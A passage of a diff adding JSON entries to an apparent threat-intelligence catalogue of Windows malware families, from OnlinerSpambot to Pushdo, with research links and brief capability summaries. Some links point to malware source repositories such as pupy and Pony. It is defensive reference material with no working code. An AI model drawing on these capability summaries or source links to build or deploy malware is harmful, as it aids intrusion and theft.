"https://malpedia.caad.fkie.fraunhofer.de/details/win.onliner", + "https://benkowlab.blogspot.fr/2017/02/spambot-safari-2-online-mail-system.html" + ] + }, + "uuid": "6cf05dad-86c8-4f46-b5b8-0a004360563f", + "value": "OnlinerSpambot", + "description": "A spambot that has been observed being used for spreading Ursninf, Zeus Panda, Andromeda or Netflix phishing against Italy and Canada." 
+ }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.oopsie", + "https://researchcenter.paloaltonetworks.com/2018/02/unit42-oopsie-oilrig-uses-threedollars-deliver-new-trojan/", + "https://docs.google.com/document/d/1oYX3uN6KxIX_StzTH0s0yFNNoHDnV8VgmVqU5WoeErc/edit#heading=h.hcd1wvpsrgfr" + ] + }, + "uuid": "d07c3def-91af-4d9b-bdf7-62c9e0b44968", + "value": "OopsIE", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.opachki", + "http://contagiodump.blogspot.com/2010/03/march-2010-opachki-trojan-update-and.html", + "http://contagiodump.blogspot.com/2009/11/win32opachkia-trojan-that-removes-zeus.html", + "https://isc.sans.edu/diary/Opachki%2C+from+%28and+to%29+Russia+with+love/7519", + "https://forum.malekal.com/viewtopic.php?t=21806" + ] + }, + "uuid": "f50de0a8-35a7-406e-9f53-8f7d5448e1e7", + "value": "Opachki", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.opghoul", + "https://securelist.com/blog/research/75718/operation-ghoul-targeted-attacks-on-industrial-and-engineering-organizations/" + ] + }, + "uuid": "25a280b2-0260-4593-bf8c-7062dfdc6c38", + "value": "OpGhoul", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.op_blockbuster", + "http://researchcenter.paloaltonetworks.com/2017/04/unit42-the-blockbuster-sequel/" + ] + }, + "uuid": "25c962c5-5616-4fe3-ad44-68c4ac4c726d", + "value": "OpBlockBuster", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.orcarat", + "http://pwc.blogs.com/cyber_security_updates/2014/10/orcarat-a-whale-of-a-tale.html" + ] + }, + "uuid": "08103f1c-f83d-4037-a1ae-109b06f79226", + "value": "OrcaRAT", + 
"description": "OrcaRAT is a Backdoor that targets the Windows platform. It has been reported that a variant of this malware has been used in a targeted attack. It contacts a remote server, sending system information. Moreover, it receives control commands to execute shell commands, and download/upload a file, among other actions." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.orcus_rat", + "https://orcustechnologies.com/", + "https://krebsonsecurity.com/2016/07/canadian-man-is-author-of-popular-orcus-rat/", + "http://researchcenter.paloaltonetworks.com/2016/08/unit42-orcus-birth-of-an-unusual-plugin-builder-rat/", + "https://blog.fortinet.com/2017/12/07/a-peculiar-case-of-orcus-rat-targeting-bitcoin-investors" + ] + }, + "uuid": "c41e7fdd-f1b1-4b87-97d7-634202af8b61", + "value": "Orcus RAT", + "description": "Orcus has been advertised as a Remote Administration Tool (RAT) since early 2016. It has all the features that would be expected from a RAT and probably more. The long list of the commands is documented on their website. But what separates Orcus from the others is its capability to load custom plugins developed by users, as well as plugins that are readily available from the Orcus repository. In addition to that, users can also execute C# and VB.net code on the remote machine in real-time." 
+ }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ordinypt", + "https://www.gdata.de/blog/2017/11/30151-ordinypt", + "https://www.bleepingcomputer.com/news/security/ordinypt-ransomware-intentionally-destroys-files-currently-targeting-germany/" + ] + }, + "uuid": "7fd96553-4c78-43de-824f-82645ed4fac5", + "value": "Ordinypt", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.overlay_rat", + "https://securityintelligence.com/overlay-rat-malware-uses-autoit-scripting-to-bypass-antivirus-detection/", + "https://www.cybereason.com/blog/brazilian-financial-malware-dll-hijacking" + ] + }, + "uuid": "842687f5-91bc-4719-ac3f-4166ae02e0cd", + "value": "Overlay RAT", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ovidiystealer", + "https://www.proofpoint.com/us/threat-insight/post/meet-ovidiy-stealer-bringing-credential-theft-masses" + ] + }, + "uuid": "30d49b12-0dca-4652-9f7a-4d0cf7555375", + "value": "OvidiyStealer", + "description": "" + }, + { + "meta": { + "synonyms": [ + "luckyowa" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.owaauth", + "https://threatpost.com/targeted-attack-exposes-owa-weakness/114925/" + ] + }, + "uuid": "37f66fcc-e093-4d97-902d-c96602a7d234", + "value": "owaauth", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.padcrypt", + "https://www.bleepingcomputer.com/news/security/padcrypt-the-first-ransomware-with-live-support-chat-and-an-uninstaller/", + "https://johannesbader.ch/2016/03/the-dga-of-padcrypt/" + ] + }, + "uuid": "c21335f5-b145-4029-b1bc-161362c7ce80", + "value": "PadCrypt", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ 
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.paladin", + "https://bitbucket.org/cybertools/whitepapers/downloads/Pitty%20Tiger%20Final%20Report.pdf", + "https://www.fireeye.com/blog/threat-research/2014/07/spy-of-the-tiger.html" + ] + }, + "uuid": "c6728a76-f4d9-4c49-a3aa-be895df13a35", + "value": "paladin", + "description": "Paladin RAT is a variant of Gh0st RAT used by PittyPanda active since at least 2011." + }, + { + "meta": { + "synonyms": [ + "ZeusPanda" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.pandabanker", + "https://github.com/JR0driguezB/malware_configs/tree/master/PandaBanker", + "https://cyber.wtf/2017/02/03/zeus-panda-webinjects-a-case-study/", + "https://www.proofpoint.com/us/threat-insight/post/zeus-panda-banking-trojan-targets-online-holiday-shoppers", + "https://www.proofpoint.com/tw/threat-insight/post/panda-banker-new-banking-trojan-hits-the-market", + "https://f5.com/labs/articles/threat-intelligence/malware/panda-malware-broadens-targets-to-cryptocurrency-exchanges-and-social-media", + "https://www.arbornetworks.com/blog/asert/panda-bankers-future-dga/", + "https://www.spamhaus.org/news/article/771/", + "https://www.vkremez.com/2018/08/lets-learn-dissecting-panda-banker.html", + "http://blog.talosintelligence.com/2017/11/zeus-panda-campaign.html", + "https://blogs.forcepoint.com/security-labs/zeus-panda-delivered-sundown-targets-uk-banks", + "https://www.arbornetworks.com/blog/asert/panda-banker-zeros-in-on-japanese-targets/", + "https://cyberwtf.files.wordpress.com/2017/07/panda-whitepaper.pdf", + "https://www.arbornetworks.com/blog/asert/let-pandas-zeus-zeus-zeus-zeus/", + "http://www.vkremez.com/2018/01/lets-learn-dissect-panda-banking.html", + "https://cyber.wtf/2017/03/13/zeus-panda-webinjects-dont-trust-your-eyes/" + ] + }, + "uuid": "31ebe294-f125-4cf3-95cc-f4150ab23303", + "value": "PandaBanker", + "description": "According to Arbor, Forcepoint and Proofpoint, Panda is a variant 
of the well-known Zeus banking trojan(*). Fox IT discovered it in February 2016.\r\n\r\nThis banking trojan uses the infamous ATS (Automatic Transfer System/Scripts) to automate online bank portal actions.\r\n\r\nThe baseconfig (c2, crypto material, botnet name, version) is embedded in the malware itself. It then obtains a dynamic config from the c2, with further information about how to grab the webinjects and additional modules, such as vnc, backsocks and grabber.\r\n\r\nPanda does have some DGA implemented, but according to Arbor, a bug prevents it from using it." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.parasite_http", + "https://www.proofpoint.com/us/threat-insight/post/parasite-http-rat-cooks-stew-stealthy-tricks" + ] + }, + "uuid": "c5eee19f-0877-4709-86ea-328e346af1bf", + "value": "parasite_http", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.penco" + ] + }, + "uuid": "a2fd9b8a-826d-4df5-9a29-d61a8456d086", + "value": "Penco", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.petrwrap", + "https://securelist.com/blog/research/77762/petrwrap-the-new-petya-based-ransomware-used-in-targeted-attacks/", + "https://blog.malwarebytes.com/cybercrime/2017/07/keeping-up-with-the-petyas-demystifying-the-malware-family/" + ] + }, + "uuid": "82ed8fae-552e-407b-b3fc-f617b7a8f996", + "value": "PetrWrap", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.petya", + "https://blog.malwarebytes.com/threat-analysis/2016/04/petya-ransomware/", + "https://blog.malwarebytes.com/threat-analysis/2016/05/petya-and-mischa-ransomware-duet-p1/", + 
"https://blog.malwarebytes.com/threat-analysis/2016/07/third-time-unlucky-improved-petya-is-out/", + "https://blog.malwarebytes.com/cybercrime/2017/07/keeping-up-with-the-petyas-demystifying-the-malware-family/", + "https://blog.malwarebytes.com/malwarebytes-news/2017/07/bye-bye-petya-decryptor-old-versions-released/" + ] + }, + "uuid": "34c9dbaa-97ac-4e1e-9eca-b7c492d67efc", + "value": "Petya", + "description": "" + }, + { + "meta": { + "synonyms": [ + "ReRol" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.pgift", + "https://community.fireeye.com/external/1093" + ] + }, + "uuid": "add29684-94b7-4c75-a43b-d039c4b76158", + "value": "pgift", + "description": "Information gathering and downloading tool used to deliver second stage malware to the infected system" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.philadelphia_ransom", + "https://blogs.forcepoint.com/security-labs/shelf-ransomware-used-target-healthcare-sector", + "https://www.cylance.com/en_us/blog/threat-spotlight-philadelphia-ransomware.html", + "https://www.proofpoint.com/us/threat-insight/post/philadelphia-ransomware-customization-commodity-malware", + "https://krebsonsecurity.com/2017/03/ransomware-for-dummies-anyone-can-do-it/", + "https://www.bleepingcomputer.com/news/security/the-philadelphia-ransomware-offers-a-mercy-button-for-compassionate-criminals/" + ] + }, + "uuid": "f2a10bec-4783-4cfc-8e93-acd3c12a517d", + "value": "Philadephia Ransom", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Trik" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.phorpiex", + "https://www.johannesbader.ch/2016/02/phorpiex/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/shylock-not-the-lone-threat-targeting-skype/", + "https://www.proofpoint.com/us/threat-insight/post/phorpiex-decade-spamming-shadows", + 
"https://www.bleepingcomputer.com/news/security/trik-spam-botnet-leaks-43-million-email-addresses/" + ] + }, + "uuid": "9759f99b-6d6c-4633-aa70-cb1d2bacc540", + "value": "Phorpiex", + "description": "Proofpoint describes Phorpiex/Trik as a SDBot fork (thus IRC-based) that has been used to distribute GandCrab, Pushdo, Pony, and coinminers. The name Trik is derived from PDB strings." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.pipcreat", + "https://www.snort.org/rule_docs/1-26941" + ] + }, + "uuid": "ea1c71fe-ad42-4c5a-8114-9ab9ecaa66f5", + "value": "pipcreat", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.pirpi", + "https://researchcenter.paloaltonetworks.com/2015/07/ups-observations-on-cve-2015-3113-prior-zero-days-and-the-pirpi-payload/" + ] + }, + "uuid": "e2325481-006f-4ad4-86d9-1a2ae6fea154", + "value": "pirpi", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.pitou", + "https://www.tgsoft.it/english/news_archivio_eng.asp?id=884", + "https://www.f-secure.com/documents/996508/1030745/pitou_whitepaper.pdf" + ] + }, + "uuid": "f371c85c-56f6-4ddf-8502-81866da4965b", + "value": "Pitou", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.pittytiger_rat", + "https://securingtomorrow.mcafee.com/mcafee-labs/targeted-attacks-on-french-company-exploit-multiple-word-vulnerabilities/", + "https://bitbucket.org/cybertools/whitepapers/downloads/Pitty%20Tiger%20Final%20Report.pdf" + ] + }, + "uuid": "7ac902e0-4a7d-4451-b0fd-cdf98fbe5018", + "value": "PittyTiger RAT", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Pykbot", + "TBag", + "Bublik" + ], + "type": [], + "refs": [ + 
"https://malpedia.caad.fkie.fraunhofer.de/details/win.pkybot", + "http://blog.kleissner.org/?p=788", + "https://blog.fortinet.com/2014/05/29/bublik-downloader-evolution", + "http://webcache.googleusercontent.com/search?q=cache:JN3yRXXuYsYJ:https://www.arbornetworks.com/blog/asert/peeking-at-pkybot" + ] + }, + "uuid": "19d71f38-422c-48f4-9f90-867eb4d4182e", + "value": "Pkybot", + "description": "Pkybot is a trojan, which has its roots as a downloader dubbed Bublik in 2013 and was seen distributing GameoverZeus in 2014 (ref: fortinet). In the beginning of 2015, webinject capability was added according to /Kleissner/Kafeine/iSight using the infamous ATS." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.plaintee", + "https://researchcenter.paloaltonetworks.com/2018/06/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/" + ] + }, + "uuid": "66087a9c-b5ac-4d6d-b79e-c0294728c876", + "value": "PLAINTEE", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.playwork", + "https://contagiodump.blogspot.com/2011/01/jan-6-cve-2010-3333-with-info-theft.html" + ] + }, + "uuid": "5e1f467b-f81e-487c-a911-ab63ae7e9b86", + "value": "playwork", + "description": "" + }, + { + "meta": { + "synonyms": [ + "TSCookie" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.plead", + "http://www.freebuf.com/column/159865.html", + "https://blog.trendmicro.com/trendlabs-security-intelligence/following-trail-blacktech-cyber-espionage-campaigns/", + "http://blog.jpcert.or.jp/2018/03/malware-tscooki-7aa0.html", + "https://documents.trendmicro.com/assets/appendix-following-the-trail-of-blacktechs-cyber-espionage-campaigns.pdf", + "https://blog.jpcert.or.jp/2018/06/plead-downloader-used-by-blacktech.html", + 
"https://www.welivesecurity.com/2018/07/09/certificates-stolen-taiwanese-tech-companies-plead-malware-campaign/" + ] + }, + "uuid": "43a56ed7-8092-4b36-998c-349b02b3bd0d", + "value": "PLEAD", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.plexor", + "https://securelist.com/blog/research/77990/unraveling-the-lamberts-toolkit/", + "https://www.symantec.com/connect/blogs/longhorn-tools-used-cyberespionage-group-linked-vault-7" + ] + }, + "uuid": "5c860744-bb12-4587-a852-ee060fd4dd64", + "value": "Plexor", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ploutus_atm", + "https://www.fireeye.com/blog/threat-research/2017/01/new_ploutus_variant.html", + "http://antonioparata.blogspot.co.uk/2018/02/analyzing-nasty-net-protection-of.html" + ] + }, + "uuid": "d91c4184-608e-47b1-b746-0e98587e2455", + "value": "Ploutus ATM", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.ployx", + "https://contagiodump.blogspot.com/2012/12/end-of-year-presents-continue.html", + "https://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Troj~Ployx-A/detailed-analysis.aspx" + ] + }, + "uuid": "7bad2f44-93b0-406d-a619-28f14c4bd344", + "value": "ployx", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Korplug" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.plugx", + "https://circl.lu/assets/files/tr-12/tr-12-circl-plugx-analysis-v1.pdf", + "https://www.rsa.com/content/dam/pdfs/2-2017/kingslayer-a-supply-chain-attack.pdf", + "http://blog.airbuscybersecurity.com/post/2014/01/plugx-some-uncovered-points.html", + "http://blog.jpcert.or.jp/2015/01/analysis-of-a-r-ff05.html", + "http://blog.jpcert.or.jp/2017/02/plugx-poison-iv-919a.html", + 
"http://blog.jpcert.or.jp/.s/2017/04/redleaves---malware-based-on-open-source-rat.html", + "https://www.arbornetworks.com/blog/asert/wp-content/uploads/2016/01/ASERT-Threat-Intelligence-Brief-2015-08-Uncovering-the-Seven-Point-Dagger.pdf", + "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", + "https://www.sophos.com/en-us/medialibrary/pdfs/technical%20papers/plugx-thenextgeneration.pdf", + "https://researchcenter.paloaltonetworks.com/2017/06/unit42-paranoid-plugx/", + "https://countuponsecurity.com/2018/02/04/malware-analysis-plugx/", + "https://countuponsecurity.com/2018/05/09/malware-analysis-plugx-part-2/", + "https://www.lac.co.jp/lacwatch/people/20171218_001445.html", + "https://blog.malwarebytes.com/threat-analysis/2016/08/unpacking-the-spyware-disguised-as-antivirus/", + "https://securelist.com/time-of-death-connected-medicine/84315/", + "https://community.rsa.com/thread/185439" + ] + }, + "uuid": "036bd099-fe80-46c2-9c4c-e5c6df8dcdee", + "value": "PlugX", + "description": "RSA describes PlugX as a RAT (Remote Access Trojan) malware family that is around since 2008 and is used as a backdoor to control the victim's machine fully. Once the device is infected, an attacker can remotely execute several kinds of commands on the affected system.\r\n\r\nNotable features of this malware family are the ability to execute commands on the affected machine to retrieve:\r\nmachine information\r\ncapture the screen\r\nsend keyboard and mouse events\r\nkeylogging\r\nreboot the system\r\nmanage processes (create, kill and enumerate)\r\nmanage services (create, start, stop, etc.); and\r\nmanage Windows registry entries, open a shell, etc.\r\n\r\nThe malware also logs its events in a text log file." 
+ }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.pngdowner", + "https://www.iocbucket.com/iocs/7f7999ab7f223409ea9ea10cff82b064ce2a1a31" + ] + }, + "uuid": "fb4313ea-1fb6-4766-8b5c-b41fd347e4c5", + "value": "pngdowner", + "description": "" + }, + { + "meta": { + "synonyms": [ + "pivy", + "poisonivy" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.poison_ivy", + "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2017/august/analysing-a-recent-poison-ivy-sample/", + "https://researchcenter.paloaltonetworks.com/2016/04/unit42-new-poison-ivy-rat-variant-targets-hong-kong-pro-democracy-activists/", + "http://blog.fortinet.com/2017/08/23/deep-analysis-of-new-poison-ivy-variant", + "https://www.fireeye.com/blog/threat-research/2013/08/operation-molerats-middle-east-cyber-attacks-using-poison-ivy.html", + "https://blog.fortinet.com/2017/09/15/deep-analysis-of-new-poison-ivy-plugx-variant-part-ii", + "https://researchcenter.paloaltonetworks.com/2014/09/recent-watering-hole-attacks-attributed-apt-group-th3bug-using-poison-ivy/", + "https://github.com/CyberMonitor/APT_CyberCriminal_Campagin_Collections/blob/master/2016/2016.04.26.New_Poison_Ivy_Activity_Targeting_Myanmar_Asian_Countries/New%20Poison%20Ivy%20Activity%20Targeting%20Myanmar%2C%20Asian%20Countries.pdf", + "https://researchcenter.paloaltonetworks.com/2016/11/unit42-tropic-trooper-targets-taiwanese-government-and-fossil-fuel-provider-with-poison-ivy/" + ] + }, + "uuid": "7789fc1b-3cbc-4a1c-8ef0-8b06760f93e7", + "value": "Poison Ivy", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.polyglot_ransom", + "https://securelist.com/blog/research/76182/polyglot-the-fake-ctb-locker/" + ] + }, + "uuid": "5ee77368-5e09-4016-ae73-82b99e830832", + "value": "Polyglot", + "description": "" + }, + { + "meta": { + 
"synonyms": [ + "Siplog", + "Fareit" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.pony", + "https://www.mcafee.com/us/resources/reports/rp-quarterly-threats-jun-2017.pdf", + "https://www.uperesia.com/analysis-of-a-packed-pony-downloader", + "https://github.com/nyx0/Pony" + ] + }, + "uuid": "cd201689-4bf1-4c5b-ac4d-21c4dcc39e7d", + "value": "Pony", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.poohmilk", + "https://researchcenter.paloaltonetworks.com/2017/10/unit42-freemilk-highly-targeted-spear-phishing-campaign/", + "http://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html" + ] + }, + "uuid": "54327cbd-d30c-4684-9a66-18ae36b28399", + "value": "PoohMilk Loader", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.popcorn_time", + "https://twitter.com/malwrhunterteam/status/806595092177965058" + ] + }, + "uuid": "4ceebc38-f50b-4817-930f-c954d203ff7b", + "value": "Popcorn Time", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.portless", + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/20134508/winnti-more-than-just-a-game-130410.pdf" + ] + }, + "uuid": "b813cb80-28ff-4713-abdc-e9a22d397bb4", + "value": "portless", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.poscardstealer", + "http://pages.arbornetworks.com/rs/arbor/images/ASERT%20Threat%20Intelligence%20Brief%202014-06%20Uncovering%20PoS%20Malware%20and%20Attack%20Campaigns.pdf" + ] + }, + "uuid": "5fa166d1-128b-4057-87e3-6676b7d9a7d7", + "value": "poscardstealer", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + 
"https://malpedia.caad.fkie.fraunhofer.de/details/win.poweliks_dropper", + "https://www.zscaler.com/blogs/research/malvertising-targeting-european-transit-users" + ] + }, + "uuid": "782bee33-9f8d-41df-a608-c014bd6a7de1", + "value": "Poweliks Dropper", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.powerduke", + "https://www.volexity.com/blog/2016/11/09/powerduke-post-election-spear-phishing-campaigns-targeting-think-tanks-and-ngos/" + ] + }, + "uuid": "c79f5876-e3b9-417a-8eaf-8f1b01a0fecd", + "value": "PowerDuke", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.powerpool", + "https://www.welivesecurity.com/2018/09/05/powerpool-malware-exploits-zero-day-vulnerability/" + ] + }, + "uuid": "02e5196e-f7ac-490a-9a92-d4865740016b", + "value": "PowerPool", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.powersniff", + "https://lokalhost.pl/gozi_tree.txt" + ] + }, + "uuid": "519d07f5-bea3-4360-8aa5-f9fcdb79cb52", + "value": "Powersniff", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.power_ratankba", + "https://www.riskiq.com/blog/labs/lazarus-group-cryptocurrency/", + "https://blog.trendmicro.com/trendlabs-security-intelligence/lazarus-campaign-targeting-cryptocurrencies-reveals-remote-controller-tool-evolved-ratankba/", + "https://www.proofpoint.com/sites/default/files/pfpt-us-wp-north-korea-bitten-by-bitcoin-bug.pdf" + ] + }, + "uuid": "606f778a-8b99-4880-8da8-b923651d627b", + "value": "PowerRatankba", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.prb_backdoor", + 
"https://sec0wn.blogspot.com/2018/05/prb-backdoor-fully-loaded-powershell.html" + ] + }, + "uuid": "2c9c42bc-8f26-4122-9454-a7eed8cd8886", + "value": "prb_backdoor", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.prikormka", + "https://www.welivesecurity.com/wp-content/uploads/2016/05/Operation-Groundbait.pdf" + ] + }, + "uuid": "00764634-4a21-4c5c-8b1f-fb294c9bdd3f", + "value": "Prikorma", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.prilex", + "https://blog.trendmicro.com/trendlabs-security-intelligence/dissecting-prilex-cutlet-maker-atm-malware-families/", + "https://www.kaspersky.com/blog/chip-n-pin-cloning/21502" + ] + }, + "uuid": "a0899fec-161d-4ba8-9594-8b5620c21705", + "value": "Prilex", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.princess_locker", + "https://blog.malwarebytes.com/threat-analysis/2016/11/princess-ransomware/", + "https://hshrzd.wordpress.com/2016/11/17/princess-locker-decryptor/", + "https://www.bleepingcomputer.com/news/security/introducing-her-royal-highness-the-princess-locker-ransomware/" + ] + }, + "uuid": "0714a7ad-45cb-44ec-92f9-2e839fd8a6b8", + "value": "PrincessLocker", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.psix", + "https://twitter.com/mesa_matt/status/1035211747957923840" + ] + }, + "uuid": "416ae41e-17b2-46f6-847b-2831a0b3f8e9", + "value": "PsiX", + "description": "According to Matthew Mesa, this is a modular bot. 
The name stems from the string PsiXMainModule in binaries until mid of September 2018.\r\n\r\nIn binaries, apart from BotModule and MainModule, references to the following Modules have be observed:\r\nBrowserModule\r\nBTCModule\r\nComplexModule\r\nKeyLoggerModule\r\nOutlookModule\r\nProcessModule\r\nRansomwareModule\r\nSkypeModule" + }, + { + "meta": { + "synonyms": [ + "PSS" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.pss", + "https://citizenlab.ca/2017/12/champing-cyberbit-ethiopian-dissidents-targeted-commercial-spyware/" + ] + }, + "uuid": "e437f01c-8040-4098-a3fa-20154b58c928", + "value": "PC Surveillance System", + "description": "Citizenlab notes that PC Surveillance System (PSS) is a commercial spyware product offered by Cyberbit and marketed to intelligence and law enforcement agencies." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.pteranodon", + "https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/" + ] + }, + "uuid": "d5138738-846e-4466-830c-cd2bb6ad09cf", + "value": "Pteranodon", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.pubnubrat", + "http://blog.alyac.co.kr/1853", + "https://blog.talosintelligence.com/2018/04/fake-av-investigation-unearths-kevdroid.html" + ] + }, + "uuid": "bcc8e3ef-fc5e-4d44-9011-4d429bac0f26", + "value": "PubNubRAT", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.punkey_pos", + "https://www.trustwave.com/Resources/SpiderLabs-Blog/New-POS-Malware-Emerges---Punkey/", + "https://www.pandasecurity.com/mediacenter/malware/punkeypos/" + ] + }, + "uuid": "57a6dbce-2d8a-44ae-a561-282d02935698", + "value": "Punkey POS", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": 
[], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.pupy", + "https://github.com/n1nj4sec/pupy", + "https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/", + "https://blog.cyber4sight.com/2017/02/malicious-powershell-script-analysis-indicates-shamoon-actors-used-pupy-rat/", + "https://www.secureworks.com/blog/iranian-pupyrat-bites-middle-eastern-organizations" + ] + }, + "uuid": "8a789016-5f8d-4cd9-ba96-ba253db42fd8", + "value": "pupy", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.pushdo", + "https://www.secureworks.com/research/pushdo", + "https://www.trendmicro.de/cloud-content/us/pdfs/business/white-papers/wp_study-of-pushdo-cutwail-botnet.pdf", + "http://malware-traffic-analysis.net/2017/04/03/index2.html", + "https://www.blueliv.com/research/tracking-the-footproints-of-pushdo-trojan/" + ] + }, + "uuid": "b39ffc73-db5f-4a8a-acd2-bee958d69155", + "value": "Pushdo", + "description": "Pushdo is usually classified as a \"downloader\" trojan - meaning its true purpose is to download and install additional malicious software. There are dozens of downloader trojan families out there, but Pushdo is actually more sophisticated than most, but that sophistication lies in the Pushdo control server rather than the trojan." 
